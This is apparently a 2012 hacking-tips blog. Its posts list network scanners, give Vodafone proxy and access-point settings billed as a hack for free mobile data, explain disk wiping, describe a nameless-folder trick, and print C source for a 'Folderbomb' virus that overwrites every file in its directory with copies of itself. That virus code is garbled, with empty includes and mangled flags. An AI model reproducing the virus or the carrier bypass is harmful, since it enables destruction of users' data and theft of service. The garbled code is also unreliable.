Thursday, November 8, 2012

Top 20 Network Penetration Testing Tools


List of Top 20 Network Penetration Testing tools :
1.    Nessus
2.    Zenmap
3.    Angry IP Scanner
4.    IP Scanner
5.    GFI lanGuard
6.    SoftPerfect Network Scanner
7.    SolarWinds Network Tool
8.    Global Network Inventory Scanner
9.    Superscan
10.    Advanced IP Scanner
11.    Retina
12.    Advanced LAN Scanner
13.    Emco Remote Installer  SE
14.    Ghost Port Scan
15.    Lizard System Network Scanner
16.    Yaps
17.    MiTec Network Scanner
18.    LanSpy
19.    Knocker
20.    Local Scan

Wednesday, August 29, 2012

Hack Vodafone For Free GPRS For Mobile

Hi Friends Now I Show you How to Hack Vodafone For Free GPRS For Mobile.
This Tricks Tested On Different Mobiles and It Works.


So Apply Below Settings On Your Mobile and Enjoy Free GPRS.

Account Name:- Vodafone_gprs
Homepage :- http://live.vodafone.in
User Name :- (no need)
Pass :- (no need)

Access Point Settings :-

Proxy :- Enabled
Proxy Address :- 10.10.1.100
Proxy Port :- 9401
Data Bearer :- Packet Data

Bearer Settings :-

Packet Data Access Point :- portalnmms
Network type :- IPV4
Authentication :- normal
User Name :- (no need)
Password :- (no need)

If This Changes Not Working than Change Your Proxy Port Number to :-
Proxy Port :- 9401

Enjoy Friends and Share This Post On Facebook and Don't Forget to add
Comments.

Thursday, April 19, 2012

How to Completely Erase a Hard Disk Drive --- After that no possibility to recover old data.....


 we delete the contents of the hard disk either by using the DELETE key on our keyboard or by Formatting the hard disk.

Deleting and Formatting – Just Not Secure Enough

But the fact is, the data will still be on the hard disk even after deleting it or formatting the hard disk. Using the delete key on your keyboard will only remove the shortcuts to the files making them invisible to users. Deleted files still reside on the hard drive and a quick Google search will show many options for system recovery software will allow anyone to reinstate that data.
Formatting the hard drive is a bit more secure way to erase the hard disk. Formatting a disk will not erase the data on the disk, only the address tables. It makes it much more difficult to recover the files. However a computer specialist would be able to recover most or all the data that was on the disk before the reformat. For those who accidentally reformat a hard disk, being able to recover most or all the data that was on the disk is a good thing. However, if you’re preparing a system for retirement to charity or any other organization, this obviously makes you more vulnerable to data theft.

Erasing the Hard Disk through DISK WIPING

So it is necessary for us to use a 100% secure way to erase the hard disk. The secure way of erasing the hard disk is called Disk Wiping. Disk wiping is a secure method of ensuring that data, including company and individually licensed software on your computer and storage devices is irrecoverably deleted before recycling or donating the equipment. Because previously stored data can be brought back with the right software and applications, the disk wiping process will actually overwrite your entire hard drive with data, several times. Once you format you’ll find it all but impossible to retrieve the data which was on the drive before the overwrite. The more times the disk is overwritten and formatted the more secure the disk wipe is.
There are a variety of disk wiping products available that you can purchase, or freely downloaded online to perform more secure disk wipes. One of my favorite disk wiping software is
You have to use this tool by burning the iso image file onto a CD or by using a floppy disk. After burning this tool you have to boot your PC and follow the screen instructions to completely erase the hard disk.

Friday, March 23, 2012

create folder without files name............

Create Folders And Files With NO! Name

This trick will allow you to create files and folders without any name.

Just follow the following steps:
1.Select any file or folder.
2.Right click on it, press rename or simply press F2.
3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from the numpad.

Note: Type the numbers 0160 from the numpad, that is, the numbers present on the right side of the keyboard. Don't type the numbers which are present on top of the character keys.

4.Press Enter and the nameless file or folder will be created.

Reason: The file or folder that seems nameless is actually named with a single space.

But what if you want to create another nameless file or folder in the same directory ?

For this you will have to rename the file with 2 spaces. Just follow these steps below:

1.Select file, press F2.
2.Hold alt key and type 0160 from the numpad.
3.Release the alt key. Now without doing anything else, again hold alt key and press 0160.
4.Press enter and you will have second nameless file in the same directory.
5.Repeat step 3 to create as many nameless files or folders in the same directory.

(we've had a problem with deleting these folders, to do so, start your computer in safe mode and delete it from there.)

Friday, March 16, 2012

Simple Virus Code


Run this on your own responsibility*/
VIRUS CODE-2
/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......


#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_R
DONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}